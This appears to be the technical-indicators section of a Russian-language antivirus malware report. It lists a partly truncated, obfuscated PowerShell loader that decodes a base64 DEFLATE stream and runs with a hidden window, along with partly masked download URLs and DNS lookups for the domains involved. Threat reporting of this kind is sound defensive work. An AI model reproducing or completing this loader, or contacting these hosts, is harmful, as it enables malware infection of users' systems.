Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ( NEW-ObJeCt sYSteM.iO.ComPrEssiON.DEFLATEstReAm([SYsTeM.IO.MeMoRYsTREam] [SystEM.coNvERt]::frOmbAse64sTRiNG('VZBNTwIxEIb/yh6aFIJ0jVEjNJuQCB4kMSJ+HbzMloGtdjvQnbUK4b+7rIkft8nMk2fmHTGb3WUeY5/yVz...
- http://www.as####2grow.co.za/0Jz8cT/
- http://ar#####ctoencolunga.com/tE/
- http://ai###tor.com/nw9rmD/
- DNS ASK ba####lcomesyou.com
- DNS ASK am#####isatatour.com
- DNS ASK as####2grow.co.za
- DNS ASK ar#####ctoencolunga.com
- DNS ASK ai###tor.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ( NEW-ObJeCt sYSteM.iO.ComPrEssiON.DEFLATEstReAm([SYsTeM.IO.MeMoRYsTREam] [SystEM.coNvERt]::frOmbAse64sTRiNG('VZBNTwIxEIb/yh6aFIJ0jVEjNJuQCB4kMSJ+HbzMloGtdjvQnbUK4b+7rIkft8nMk2fmHTGb3WUeY5/yVz...' (со скрытым окном)